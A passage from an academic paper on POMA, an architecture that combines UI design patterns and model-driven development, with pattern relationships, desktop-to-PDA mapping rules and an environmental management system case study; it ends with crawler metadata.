such as comparing, buying, going to a page, sending a page to others, etc. Users must be able to visualize their "collection". The following are some of the information visualization patterns for displaying such collections: Favorite, Bookmark, Frequently Visited Page, Preferences, and Navigable Spaces Map. This category of patterns provides a map to a large amount of content which can be too much to be presented reasonably in a single view. The content can be organized into distinct conceptual spaces or working surfaces which are semantically linked, so that it is natural and meaningful to go from one to another. The map in Figure 4 is an example of this category of patterns. ![Figure 4: The Navigation Spaces Map pattern implemented using Tree Hyperbolic, a sophisticated visualization technique.](image) **Navigation patterns** Navigation patterns help the user move easily and in a straightforward manner between information chunks and their representations. They can obviously reduce the user's memory load [7; 1]. See [3; 5; 29; 9] for an exhaustive list of navigation patterns. The Linear Navigation pattern is suitable when a user wants a simple way to navigate from one page to the next in a linear fashion, i.e. move through a sequence of pages. The Index Browsing pattern is similar, and allows a user to navigate directly from one item to the next and back. The ordering can be based on a ranking. For every item presented to the user, a navigation widget allows the user to choose the next or previous item in the list. The ordering criterion should be visible (and be user-configurable). To support orientation, the current item number and total number of items should be clearly visible. A breadcrumb (Figure 5) is a widely used pattern which helps users to know where they are in a hierarchical structure and to navigate back up to higher levels in the hierarchy. It shows the hierarchical path from the top level to the current page and makes each step clickable. ![Figure 5: Breadcrumb pattern](image) Interaction patterns This category of interaction patterns provides basic information on interaction style, mainly on how to use controls such as buttons, lists of items, menus, dialog boxes, etc. This category of patterns is used whenever users need to take an important action that is relevant in the current context of the page they are viewing. Users must be made aware of the importance of the action in relation to other actions on the page or site. To view/act on a linear-ordered set of items, the Stepping pattern (Figure 6) allows users to go to the next and previous task or object by clicking on the 'next' or 'previous' links. The 'next' link takes the users to the next item in the sequence, while the 'previous' link takes them a step back. It is recommended that a 'next' or 'previous' link be placed close to the object to which it belongs, preferably above the object so that users do not have to scroll to it. Make sure the next/previous links are always placed in the same location, so that users clicking through a list do not have to move the mouse pointer. The convention, at least in western cultures, is to place the 'previous' link on the left and the 'next' link on the right. Presentation patterns The authors of technical documents discovered long before interactive systems were invented that users appreciate short "chunks" of information [6]. Patterns in this category, called Presentation patterns, also suggest different ways for displaying chunks of information and ways for grouping them in pages. Presentation patterns also define the look and feel of interactive systems, while at the same time defining the physical and logical layout suitable for specific systems, such as home pages, lists, and tables. For example, how long does it take to determine whether or not a document contains relevant information? This question is a critical design issue, in particular for resource-constrained (small) devices. Patterns in this category use a grid, which is a technique taken from print design, but which is easily applicable to interactive system design as well. In its strictest form, a grid is literally a grid of X by Y pixels. The elements on the page are then placed on the cell borderlines and aligned overall on horizontal and vertical lines. A grid is a consistent system in which to place objects. In the literature on print design, there are many variations of grids, most of them based on modular and column grids. Often, a mix of both types of grids will be used. An example of a grid in Figure 7 is used to create several dialog box patterns. ![Figure 7: An example of a grid](image) An example of these types of patterns is the Executive Summary pattern. Our Executive Summary pattern gives users a preview of the underlying information before they spend time downloading, browsing, and reading large amounts of information (Figure 8). ![Figure 8: Example of a structural pattern: Executive Summary](image) 2.3. Pattern Composition A platform-independent pattern-oriented design exploits several relationships between patterns. Gamma et al. [2] emphasize that defining the list of related patterns as part of the description of a pattern is a key notion in the composition of patterns and their uses. Zimmer [15] implements this idea by dividing the relations between the patterns of the Gamma catalog... into three types: “X is similar to Y”, “X uses Y”, and “Variants of X use Y”. These types are, in practice, relationships between patterns in a specific context; in other words, they are relationships between instances of patterns. Based on Zimmer’s definitions [15], we define five types of relationships between patterns. **Similar** Two patterns (X, Y) are similar, or equivalent, if and only if X and Y can be replaced by each other in a certain composition. This means that X and Y are patterns of the same category and they provide different solutions to the same problem in the same context. As illustrated in Figure 9, the *Index Browsing* and *Menu Bar* patterns are similar. They both provide navigational support in the context of a medium-sized interactive system. ![Figure 9: Similar patterns extracted from the OMG site](image) **Competitor** Two patterns (X, Y) are competitors if X and Y cannot be used at the same time for designing the same artifact relationship that applies to two patterns of the same pattern category. Two patterns are competitors if and only if they are similar and interchangeable. For example, the Web patterns *Convenient Toolbar* and *Index Browsing* are competitors (Figure 10). The *Index Browsing* pattern can be used as a shortcut toolbar that allows a user to directly access a set of common services from any interactive system. The *Convenient Toolbar*, which provides the same solution, is generally considered more appropriate. ![Figure 10: Two Competitor patterns](image) Super-ordinate A pattern X is a super-ordinate of pattern Y, which means that pattern Y is used as a building block to create pattern X. An example is the Home Page pattern, which is generally composed of several other patterns (Figure 11). Figure 11: Home Page pattern with sub-ordinate patterns Sub-ordinate (X, Y) are sub-ordinate if and only if X is embeddable in Y. Y is also called a super-ordinate of X. This relationship is important in the process of mapping pattern-oriented design from one platform to another. For example, the Convenient Toolbar pattern (Figure 11) is a sub-ordinate of the Home Page pattern for either a PDA or desktop system. Implementations of this pattern are different for different devices. Neighboring Two patterns (X, Y) are neighboring if X and Y belong to the same pattern category. For example, the Sequential and Hierarchical patterns are neighboring because they belong to the same category of patterns, and neighboring patterns may include the set of patterns for designing a specific page such as a home page (Figure 11). 2.4. Pattern Mapping Another component in our architectural framework is the concept of pattern mapping. Pattern mapping is the process of creating a design of specific models for each platform called platform-specific model (PSM) – from the PIM and mapping rules which are described below. Using a desktop system as a starting point, it is possible to redesign it for other platforms. The original set of patterns used in the system is mapped or replaced, in order to redesign and re-implement the system and, in particular, the UI for mobile or Personal Digital Assistant (PDA) systems. Since patterns hold information about design solutions and context of use, platform capabilities and constraints are implicitly addressed in the transformed patterns. To illustrate pattern mapping, we describe here the effect of screen size on the selection and use of patterns. Different platforms use different screen sizes, and these different screen sizes afford different types and variants of patterns. The problem to resolve when mapping a pattern-oriented design (POD) is how the change in screen size between two platforms affects redesign at the pattern level. The amount of information that can be displayed on a given platform screen is determined by a combination of area and number of pixels. The total difference in information capacity between platforms will be somewhere between these two measures: 20 times the area and 10 times the pixels. To map the desktop display architecture to the PDA display architecture, the options are as follows: 1. To reduce the size of the architecture, it is necessary to reduce significantly both the number of pages and the quantity of information per page. 2. To hold the architecture size constant (i.e. topics or pages), it is necessary to significantly reduce the quantity of information per page (by a factor of about 10 to 20). 3. To retain all the information in the desktop architecture, it is necessary to significantly increase the size of the architecture, since the PDA can hold less information per page. The choice of mapping will depend on the size of the architecture and the value of the information: - For small desktop architectures, the design strategy can be weighted either toward reducing information if the information is not important, or toward increasing the number of pages if the information is important. - For medium and large desktop architectures, it is necessary to weight the design strategy heavily toward reducing the quantity of information, otherwise the architecture size and number of levels would rapidly explode out of control. Finally, we can consider mapping patterns and graphical objects in the context of the amount of change that must be applied to the desktop design or architecture to fit it into a PDA format. The following is the list of mapping rules we suggest: 1. **Identical**: No change to the original design. For example, drop-down menus can usually be copied from a desktop to a PDA without any design changes. 2. **Scalable**: Changes to the size of the original design or to the number of items in the original design. For example, a long horizontal menu can be adapted to a PDA by reducing the number of menu elements. 3. **Multiple**: Repeating the original design, either simultaneously or sequentially. For example, a single long menu can be transformed into a series of shorter menus. 4. **Fundamental**: Change the nature of the original design. For example, permanent left-hand vertical menus are useful on desktop displays, but are not practical on most PDAs. In mapping to a PDA, left-hand menus normally need to be replaced with an alternative such as a drop-down menu. These mapping rules can be used by designers in the selection of patterns, especially when different patterns apply for one platform but not for another, when the cost of adapting or purchasing a pattern is high, or when the applicability of a pattern (knowing how and when to apply a pattern) is questionable. This list of four mapping rules is especially relevant to the automation of cross-platform design mapping, since the designs that are easiest to map are those that require the least mapping. The category of patterns therefore identifies where human intervention will be needed for design decisions in the mapping process. In addition, when building a desktop design for which a PDA version is also planned, the category of patterns indicates which patterns to use in the desktop design to allow easy mapping to the PDA design. Figure 12 illustrates some of the navigation design patterns used in the home page of a desktop-based system. Once these patterns are identified in the desktop-based system, they can be mapped or replaced by others in a PDA version. Figure 12: Patterns extracted from the CBC News site Figure 13 demonstrates the redesigned interface of the CBC site for migrating to a PDA platform. The permanent horizontal menu pattern at the top (P5) in the original desktop UI were repositioned to a shorter horizontal menu pattern (P5s). In order to accommodate this change on the small PDA screen, the three different horizontal menus had to be shortened, and only important navigation items were used. The keyword search pattern (P13) remains as a keyword search. The permanent vertical menu on the left (P6) was redesigned to a drop-down menu (P15). The drop-down menu in the PDA design also includes the menu headings, “What’s on today?” and “Online features” from the temporary vertical menu (P3) in the original desktop design. Finally, the information portal (P4), which is the first item that captures the user’s attention, was redesigned as a smaller information portal (P4s). Figure 13: Migration of the CBC site to a PDA Platform using Pattern Mapping 3. Models and Model-Driven Design: Categorization and Transformation 3.1. About Models As the complexity of interactive systems grows, the role of models is becoming essential for dealing with the numerous aspects involved in their development and maintenance processes. Models allow the relevant aspects of a system to be captured from a given perspective and at a specific level of abstraction. In a model-driven UI design approach, various models are used to describe the relevant aspects of the UI. Many facets exist, as well as related models. Design is an assembly of parts which realizes a specification. A model of a system is a specification of that system and its environment for some purpose. Models consist of a set of elements with a graphical and/or textual representation [56]. The idea behind model-driven design is to create different models of a system at different levels of abstraction, and to use transformations of the models to produce the implementation of the interactive systems. A number of distinct models have been suggested in the following work: - the OMG’s Model-Driven Architecture [3, 4, 5, 6, 7], - Si Alhir’s Understanding the Model Driven Architecture (MDA), Methods & Tools’ [8], - Paternò’s Model-Based Design and Evaluation of Interactive Systems [22], - Vanderdonckt’s Task Modeling in Multiple Contexts of Use [23], - Msheik’s Compositional Structured Component Model: Handling Selective Functional Composition [30], - Puerta’s Modeling Tasks with Mechanisms [24]. In our work here, we investigate how these existing collections of models can be used as building blocks in the context of the five levels of the proposed POMA architecture. Our approach focuses on a subset of the proposed models and consists of: - a domain model, - a task model, - a dialog model, - a presentation model, and - a layout model. In the work reported in the next section, we describe how these models can be used at five levels of the proposed POMA architecture to create a model-driven architecture for interactive systems. 3.2. Model Categorization A categorization of models is proposed next. Examples of models are also presented to illustrate the need to map and/or to transform several types of models to provide solutions to complex problems at the five architectural levels. Domain Model The Domain model is sometimes called a business model. It encapsulates the important entities of a system domain along with their attributes, methods, and relationships [13]. Within the scope of UI development, it defines the objects and functionalities accessed by the user. via the interface. Such a model is generally developed using the information collected during the business and functional requirements stage. The information defines the list of data and features or operations to be performed in various ways, i.e. by different users on different platforms. The first model-based approaches used a Domain model to drive the UI at runtime. In this context, the Domain model would describe the system in general, and include some specific information for the UI. For example, the Domain model [13] would include: - a class hierarchy of objects which exist in the system, - the properties of the objects, - actions which can be performed on the objects, - units of information (parameters) required by the actions, and - pre- and post-conditions for the actions. Domain models should represent the important entities along with their attributes, methods, and relationships. Consequently, the only real way to integrate UI and system development is the simultaneous use of the data model. That is why recent model-based approaches include a Domain model known from the system engineering methods. Four other models: Task, Dialog, Presentation, and Layout, have the Domain model as an input. Figure 14 is an example of implementation of the Login pattern. ![Figure 14: Login view of the system on the laptop platform](image) Figure 15 is an example of the implementation of the Login pattern. ![Figure 15: Login view of the system on the PDA platform](image) Task model The Task model makes it possible to describe how tasks can be performed to reach the user’s goals when interacting with an interactive system [22]. Using this model, designers can develop integrated descriptions of the system from a functional and interactive point of view. Task models are typically tasks and subtasks hierarchically decomposed into atomic actions [23]. In addition, the relationships between tasks are described with the execution order or dependencies between peer tasks. The tasks may contain attributes about their importance, their duration of execution, and their frequency of use. For our purposes, we reuse the following definition: A **task** is a goal, along with the ordered set of tasks and actions that would satisfy it in the appropriate context. [13] This definition highlights the intertwining nature of tasks and goals. Actions are required to satisfy goals. Furthermore, the definition allows the decomposition of tasks into sub-tasks, and there exists some ordering among the sub-tasks and actions. In order to support this definition, we need to add the definitions of goal, action, and artifact: A **goal** is an intention to change or maintain the state of an artifact (based on [13]). An **action** is any act which has the effect of changing or maintaining the state of an artifact (based on [13]). An **artifact** is an object which is essential for a task. Without this object, the task cannot be performed; the state of this artifact is usually changed in the course of performance of a task. Artifacts are real things which exist in the context of task performance. In business, artifacts are modeled as objects and represented in the business model. This implies a close relationship between the Task model and the business model. With these definitions, we can derive the information that needs to be represented in a Task model. According to [13], the description of one task includes: - One goal, - A non-empty set of actions or other tasks which are necessary to achieve the goal, - A plan of how to select actions or tasks, and - A model of an artifact, which is influenced by the task. Consequently, the development of the Task model and the Domain model is interrelated. One of the goals of model-based approaches is to support user-centered interface design. Therefore, they must enable the UI designer to create the various Task models. Three other models: Dialog, Presentation, and Layout, have the Domain and Task models as inputs. Figure 16 represents the structure of the Task model of the environmental management system. As shown in Figure 16, the Login, Multi-Value Input Form and Find patterns can be used in order to complete the Task model at the lower levels. Figure 16: Coarse-grained Task model of the environmental management system **Dialog Model** This model makes it possible to provide dialog styles to perform tasks and to provide proven techniques for the dialog. The Dialog model defines the navigational structure of the UI. It is a more specific model and can be derived in good measure from the more abstract Task, User, and Domain models. A dialog model is used to describe the human-computer conversation. It specifies when the end-user can invoke commands, functions, and interaction media, when the end-user can select or specify inputs, and when the computer can query the end-user and present information [26]. In other words, the Dialog model describes the sequencing of input tokens, output tokens, and the way in which they are interleaved. It describes the syntactical structure of human-computer interaction. The input and output tokens are lexical elements. Therefore, in particular, this model specifies the user commands, interaction techniques, interface responses, and command sequences permitted by the interface during user sessions. Two other models, Presentation and Layout, have the Domain, Task, and Dialog models as inputs. Figure 17 depicts the various dialog view interactions of the environmental management system’s suggested dialog graph structure for the laptop and PDA platforms. ![Figure 17: Dialog Graph of the environmental management system for the laptop and PDA platforms](image-url) Presentation Model The Presentation Model describes the visual appearance of the UI [13]. This model exists at two levels of abstraction: the abstract and the concrete. In fact, they define the appearance and the form of presentation of the system on the interactive system providing solutions as to how the contents or related services can be visually organized into working surfaces, the effective layout of multiple information spaces, and the relationship between them. Moreover, they define the physical and logical layout suitable for specific interactive systems such as home pages, lists, and tables. A Presentation model describes the constructs that can appear on an end-user’s display, their layout characteristics, and the visual dependencies among them. The displays of most systems consist of a static part and a dynamic part. The static part includes the presentation of the standard widgets like buttons, menus, and list boxes. Typically, the static part remains fixed during the runtime of the interactive system, except for state changes like enable/disable, visible/invisible. The dynamic part displays system-dependent data, which typically change during runtime (e.g. the system generates output information, while the end-user constructs system-specific data). The former provides an abstract view of a generic interface, which represents corresponding Task and Dialog models. Another model, Layout, has the Domain, Task, Dialog, and Presentation models as inputs. Figure 23 portrays the presentation model. Layout Model A Layout model constitutes a concrete instance of an interface. It consists of a series of UI components which defines the visual layout of a UI and the detailed dialogs for a specific platform and context of use. There may be many concrete instances of a Layout model which can be derived from Presentation and Dialog models. This model makes it possible to provide conceptual models and architectures for organizing the underlying content across multiple pages, servers, databases, and computers. It is concerned with the look and feel of interactive systems and with the construction of a general drawing area (e.g. a canvas widget), and all the outputs inside a canvas must be programmed using a general-purpose programming language and a low-level graphical library. Figure 23 portrays the layout model. 3.3. Transformation Rules Model transformation is the process of converting one or more models – called source models – to an output model – the target model – of the same system. Transformations may combine elements of different source models in order to build a target model. Transformation rules apply to all the types of models listed above. The following steps make up the list of transformation rules suggested in [17], and are considered as part of our framework: 1. Maintain tracking structures of all class instances where needed 2. Maintain tracking structures for Association populations where needed 3. Support state-machine semantics 4. Enforce Event ordering 5. Preserve Action atomicity 6. Provide a mapping for all analysis elements, including: - Domain, Domain Service - Class, Attribute, Association, Inheritance, Associative Class, Class Service - State, Event, Transition, Superstate, Substate - All Action-modeling elements The transformations between models [8] provide a path which enables the automated implementation of a system to be derived from the various models defined for it. 4. POMA Architecture 4.1 Overview of POMA The proposed architecture consists of six architectural levels of models using patterns (Figure 18) and UML specifications of system architecture for interactive systems development called POMA (Pattern-Oriented and Model-Driven Architecture). POMA enables us to specify and build interactive systems. It is an architecture which supports both novices and experts in system development. The architecture of system development (Figure 18) includes: - A library of patterns by category used in the architecture with their selection, composition, and mapping; - The various models that we propose for the development of interactive systems with their transformation (PIM to PIM, and PSM to PSM) and their mappings which are: PIM to PSM. POMA is based on: - Six architectural levels and categories of patterns; - Ten models, five of which are [POMA.PIM] and five others which are [POMA.PSM]; - Four types of relations used in POMA architecture, which are: 1. Composition: used to combine different patterns to produce a [POMA.PIM] by applying the composition rules 2. Mapping: used to build a [POMA.PIM] which becomes a [POMA.PSM] by applying the mapping rules 3. Transformation: used to establish the relationship between two models (PIM or PSM) by applying the transformation rules 4. Generation: is used to generate the source code of the whole system by applying the generation code rules The direction in which to read the POMA architecture in Figure 18 is as follows: - Vertically, it is about the composition of the patterns to produce ten PIM and PSM models. - Horizontally, it is about the composition and mapping of the patterns to produce five PIM and five PSM models, and the generation of the source code of the whole system (not included in this research). Figure 18: POMA architecture for interactive systems development 5. Illustrative case study This section presents a case study which describes the design of a non-functional UI prototype of a simplified environmental management system (Figure 23), illustrating and clarifying the core ideas of our approach and its practical relevance. It can also be used by an object-oriented designer to learn how to use design patterns. This environmental management system allows the analysis of the environment, its evolution and its economic and social dimensions, and proposes some indicators of performance. The main objectives of environmental management are the treatment and distribution of water, improving air quality, monitoring noise, the treatment of waste, monitoring the health of fauna and flora, monitoring land use, preserving coastal and marine environments, and managing natural and technological risks (Figure 23). Note that only a simplified version of the environmental management system will be developed here. The system and corresponding models will not be tailored to different platform or user roles. The main purpose of the example is to show that models consist of a series of model transformations, in which mappings from abstract to concrete models must be specified. In addition, it illustrates how patterns are used to establish the various models, as well as to transform one model into another while respecting the patterns composition rules described above and the patterns mapping rules. We present below a general overview of the PIM and PSM models of the environmental management system in applying the pattern composition steps and mapping rules, as well as the transformation rules for these five models. The details of this illustrative case study are presented in the Appendix, in which the following five models representing the same system are illustrated on a laptop platform and on a PDA platform: Domain model, Task model, Dialog model, Presentation model, and Layout model of the POMA architecture. Table 2 lists the patterns that will be used by the system. <table> <thead> <tr> <th>Pattern Name</th> <th>Model Type</th> <th>Problem</th> </tr> </thead> <tbody> <tr> <td>Login</td> <td>Domain</td> <td>The user’s identity needs to be authenticated in order to be allowed access to protected data and/or to perform authorized operations.</td> </tr> <tr> <td>Multi-Value Input Form</td> <td>Domain</td> <td>The user needs to enter a number of related values. These values can be of different data types, such as “date”, “string”, or “real”.</td> </tr> <tr> <td>Submit</td> <td>Domain</td> <td>The user needs to submit coordinates to the authentication process to access the system.</td> </tr> <tr> <td>Feedback</td> <td>Domain</td> <td>The user needs help concerning the use of the Login Form.</td> </tr> <tr> <td>Close</td> <td>Domain</td> <td>The need to close the system from the Login form</td> </tr> <tr> <td>Find (Search, Browse, Executive Summary)</td> <td>Task</td> <td>The need to find indicators related to the task concerned, to find environmental patterns related to the indicators, and to find a presentation tool to display the results of the indicators and the environmental patterns</td> </tr> <tr> <td>Path (Breadcrumb)</td> <td>Task</td> <td>The need to construct and display the path that combines the data source, task, and/or subtask</td> </tr> <tr> <td>Index Browsing</td> <td>Task</td> <td>The need to display all indicators listed as index</td> </tr> <tr> <td>Pattern</td> <td>Type</td> <td>Description</td> </tr> <tr> <td>--------------------</td> <td>------------</td> <td>-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------</td> </tr> <tr> <td>Adapter</td> <td>Task</td> <td>The need to convert the interface of a class into another interface that clients expect; an adapter lets classes work together which could not otherwise do so because of interface incompatibility</td> </tr> <tr> <td>Builder</td> <td>Task</td> <td>The need to separate the construction of a complex object from its representation, so that the same construction process can create different representations</td> </tr> <tr> <td>List</td> <td>Task</td> <td>The need to display the information using forms</td> </tr> <tr> <td>Table</td> <td>Task</td> <td>The need to display the information in tables</td> </tr> <tr> <td>Map</td> <td>Task</td> <td>The need to display the information in geographic maps</td> </tr> <tr> <td>Graph</td> <td>Task</td> <td>The need to display the information in graphs</td> </tr> <tr> <td>Home Page</td> <td>Task</td> <td>The need to define the layout of an interactive system home page, which is important because the home page is the interactive system interface with the world and the starting point for most user visits</td> </tr> <tr> <td>Wizard (Welie, 2004)</td> <td>Dialog</td> <td>The user wants to achieve a single goal, but several decisions and actions need to be taken consecutively before the goal can be achieved.</td> </tr> <tr> <td>Recursive Activation (Paternò, 2000)</td> <td>Dialog</td> <td>The user wants to activate and manipulate several instances of a dialog view.</td> </tr> <tr> <td>Unambiguous Format</td> <td>Presentation</td> <td>The user needs to enter data, but may be unfamiliar with the structure of the information and/or its syntax.</td> </tr> <tr> <td>Form</td> <td>Presentation</td> <td>The user must provide structural textual information to the system. The data to be provided are logically related.</td> </tr> <tr> <td>House Style (Tidwell, 2004)</td> <td>Layout</td> <td>Usually, the system consists of several pages/windows. The user should have the impression that it all “hangs together” and looks like one entity.</td> </tr> </tbody> </table> Table 2: Pattern Summary To visualize the models, we have used an extended version of the ConcurTaskTree (CTT) notation. In addition to the predefined types, we have enhanced the CTT by adding a fifth type: The Pattern Task. Figure 19 shows the graphical representation of the pattern. Figure 19: Pattern symbol The [POMA.PIM]-independent model of the environmental management system is obtained by composing patterns between them and by taking into account the patterns composition rules – see Figure 20. The mapping rules of the patterns of the environmental management system for laptop and PDA platforms are listed in Table 3. <table> <thead> <tr> <th>HCI patterns of the Microsoft platform</th> <th>Type of mapping</th> <th>Replacement patterns for the laptop platform</th> <th>Replacement patterns for the PDA platform</th> </tr> </thead> <tbody> <tr> <td>P1. Login</td> <td>Identical</td> <td>P1. Login</td> <td>P1. Login</td> </tr> <tr> <td>P3. Submit</td> <td>Scalable or fundamental</td> <td>P3. Submit</td> <td>P3.s. Submit (smaller button)</td> </tr> <tr> <td>P6. Find (Search, Browse, Executive Summary)</td> <td>Identical, Scalable</td> <td>P6. Find (Search, Browse, Executive Summary)</td> <td>P6. Find (Search, Browse, Executive Summary)</td> </tr> <tr> <td>P7. Path (Breadcrumb)</td> <td>Identical, Scalable (Laptop) -Scalable or fundamental (PDA)</td> <td>P7. Path (Breadcrumb)</td> <td>- P7.1.s. Shorter Breadcrumb Trial - P7.2. Drop-down “History” menu</td> </tr> <tr> <td>P8. Index Browsing</td> <td>Identical</td> <td>P8. Index Browsing</td> <td>P8. Drop-down menu</td> </tr> <tr> <td>P12. Table</td> <td>Identical</td> <td>P12. Table</td> <td>P12. Table</td> </tr> <tr> <td>P14. Graph</td> <td>Identical</td> <td>P14. Graph</td> <td>P14. Graph</td> </tr> </tbody> </table> Table 3: Example of pattern mapping of the of the environmental management system model for laptop and PDA platforms After the mapping, we obtain the PSM Model of the environmental management system for the laptop platform – see Figure 21 for the UML diagram of the PSM environmental management system model for the laptop platform. Figure 21: UML diagram of the PSM environmental management system model for the laptop platform After the mapping, we obtain the PSM environmental management system model for the PDA platform – see the UML diagram of the PSM environmental management system model for the PDA platform in Figure 22. A final UI of the environmental management system is shown in Figure 23. ![Figure 23: Screenshot of the environmental management system for the laptop platform](image) 6. Conclusion In this paper, our discussion focused on an architectural model combining two key approaches: model-driven and pattern-oriented. We first describe an architectural level and categories of patterns (Navigation patterns, Interaction patterns, Visualization patterns, Presentation patterns, Interoperability patterns, and Information patterns), as well as the various relationships between patterns. These relationships are used to combine and map several types of patterns to create a pattern-oriented design for interactive systems, as well as to show how to generate specific implementations suitable for different platforms from the same pattern-oriented design. Then, we proposed five categories of models (Domain model, Task model, Dialog model, Presentation model, and Layout model) to address some of the challenging problems, such as: (a) decoupling the various aspects of interactive systems, such as business logic, UI, navigation, and information architecture; and (b) isolating platform-specific problems from the concerns common to all interactive systems. Finally, we presented a case study to illustrate and clarify the core ideas of our approach and its practical relevance. The Model-View-Controller (MVC), Model-View-Presenter (MVP), Presentation-Abstraction-Control (PAC), Seeheim, Arch/Slinky, PAC-Amadeus, and POMA architectures are similar in many ways, but each has evolved to address a slightly different concern. By becoming familiar with these architectures and other related architecture models, developers and architects will be better equipped to choose an appropriate solution in their next design endeavor, or possibly in the creation of future pattern-oriented and model-driven architectures. The current limitations of the POMA are the following: - There is a need to define measures to study the usability patterns that could be used in the POMA. - The patterns do not allow flexibility between the platform-independent specification of interfaces, the platform-specific form of those interfaces, and the eventual implementation of those interfaces. - The patterns do not constitute an approach to the full life cycle integration and interoperability of enterprise systems comprising software, hardware, humans, and business practices. - The POMA does not encourage the designer to consider other aspects of the dialog which are very important to the user, like the help function or error-handling. - The POMA does not facilitate the use of the design constraints or the description of the interface, which are of great importance to the designer [57; 58; 59; 60]. - Patterns are signs of weakness in programming languages. - Finding and applying the appropriate architectural patterns in practice still remains largely an ad hoc and unsystematic process, e.g. there is a lack of consensus in the community with respect to the “philosophy” and granularity of architectural patterns, and a lack of a coherent pattern language. Further research is required to address these limitations, one by one. The strengths of the POMA architecture are the following: - The POMA facilitates the use of patterns by beginners as well as experts - The POMA supports the automation of both the pattern-driven and model-driven approaches to design. - The POMA ensures the quality of the applications produced, since a pattern-oriented architecture will also have to enable the encapsulation of quality attributes and to facilitate prediction. - The POMA supports the communication and reuse of individual expertise as regards good design practices. - The POMA integrates all the various new technologies (including, but not limited to, traditional office desktops, laptops, palmtops, PDAs with and without keyboards, mobile telephones, and interactive televisions). In terms of the evolution of the POMA architecture, some of the next steps will include: - Standardization of the POMA architecture to all types of applications, and not only interactive systems; - Proposal of a process for the generation of source code from five POMA PSM models; - Building of a tool to allow the automation of the entire POMA architecture process to facilitate the development of interactive applications of any category for both novice and expert users. 7. Acknowledgments We extend special thanks to Olivier ALNET, who participated in the development of the POMA architecture example. 8. References
{"Source-Url": "http://www.labunix.uqam.ca/~lounis_h/inf980x/TALE2301_v1.pdf", "len_cl100k_base": 13010, "olmocr-version": "0.1.53", "pdf-total-pages": 36, "total-fallback-pages": 0, "total-input-tokens": 94542, "total-output-tokens": 18020, "length": "2e13", "weborganizer": {"__label__adult": 0.0005407333374023438, "__label__art_design": 0.006198883056640625, "__label__crime_law": 0.0003719329833984375, "__label__education_jobs": 0.003719329833984375, "__label__entertainment": 0.00020503997802734375, "__label__fashion_beauty": 0.0002732276916503906, "__label__finance_business": 0.00034928321838378906, "__label__food_dining": 0.0004775524139404297, "__label__games": 0.001255035400390625, "__label__hardware": 0.001682281494140625, "__label__health": 0.00045990943908691406, "__label__history": 0.0007925033569335938, "__label__home_hobbies": 0.0001634359359741211, "__label__industrial": 0.0006318092346191406, "__label__literature": 0.0006814002990722656, "__label__politics": 0.0003349781036376953, "__label__religion": 0.0007452964782714844, "__label__science_tech": 0.05853271484375, "__label__social_life": 0.00010091066360473631, "__label__software": 0.01273345947265625, "__label__software_dev": 0.90869140625, "__label__sports_fitness": 0.0003190040588378906, "__label__transportation": 0.0006585121154785156, "__label__travel": 0.0003218650817871094}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 77791, 0.0176]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 77791, 0.62424]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 77791, 0.88457]], "google_gemma-3-12b-it_contains_pii": [[0, 2488, false], [2488, 5701, null], [5701, 8938, null], [8938, 11381, null], [11381, 14825, null], [14825, 18907, null], [18907, 21212, null], [21212, 23803, null], [23803, 25855, null], [25855, 27806, null], [27806, 29220, null], [29220, 30751, null], [30751, 32577, null], [32577, 35822, null], [35822, 37604, null], [37604, 40210, null], [40210, 41705, null], [41705, 44452, null], [44452, 44528, null], [44528, 45929, null], [45929, 48993, null], [48993, 49415, null], [49415, 51237, null], [51237, 51302, null], [51302, 55345, null], [55345, 59020, null], [59020, 59214, null], [59214, 62842, null], [62842, 63155, null], [63155, 63357, null], [63357, 65000, null], [65000, 67803, null], [67803, 70311, null], [70311, 73422, null], [73422, 76678, null], [76678, 77791, null]], "google_gemma-3-12b-it_is_public_document": [[0, 2488, true], [2488, 5701, null], [5701, 8938, null], [8938, 11381, null], [11381, 14825, null], [14825, 18907, null], [18907, 21212, null], [21212, 23803, null], [23803, 25855, null], [25855, 27806, null], [27806, 29220, null], [29220, 30751, null], [30751, 32577, null], [32577, 35822, null], [35822, 37604, null], [37604, 40210, null], [40210, 41705, null], [41705, 44452, null], [44452, 44528, null], [44528, 45929, null], [45929, 48993, null], [48993, 49415, null], [49415, 51237, null], [51237, 51302, null], [51302, 55345, null], [55345, 59020, null], [59020, 59214, null], [59214, 62842, null], [62842, 63155, null], [63155, 63357, null], [63357, 65000, null], [65000, 67803, null], [67803, 70311, null], [70311, 73422, null], [73422, 76678, null], [76678, 77791, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 77791, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 77791, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 77791, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 77791, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 77791, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 77791, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 77791, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 77791, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 77791, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 77791, null]], "pdf_page_numbers": [[0, 2488, 1], [2488, 5701, 2], [5701, 8938, 3], [8938, 11381, 4], [11381, 14825, 5], [14825, 18907, 6], [18907, 21212, 7], [21212, 23803, 8], [23803, 25855, 9], [25855, 27806, 10], [27806, 29220, 11], [29220, 30751, 12], [30751, 32577, 13], [32577, 35822, 14], [35822, 37604, 15], [37604, 40210, 16], [40210, 41705, 17], [41705, 44452, 18], [44452, 44528, 19], [44528, 45929, 20], [45929, 48993, 21], [48993, 49415, 22], [49415, 51237, 23], [51237, 51302, 24], [51302, 55345, 25], [55345, 59020, 26], [59020, 59214, 27], [59214, 62842, 28], [62842, 63155, 29], [63155, 63357, 30], [63357, 65000, 31], [65000, 67803, 32], [67803, 70311, 33], [70311, 73422, 34], [73422, 76678, 35], [76678, 77791, 36]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 77791, 0.103]]}
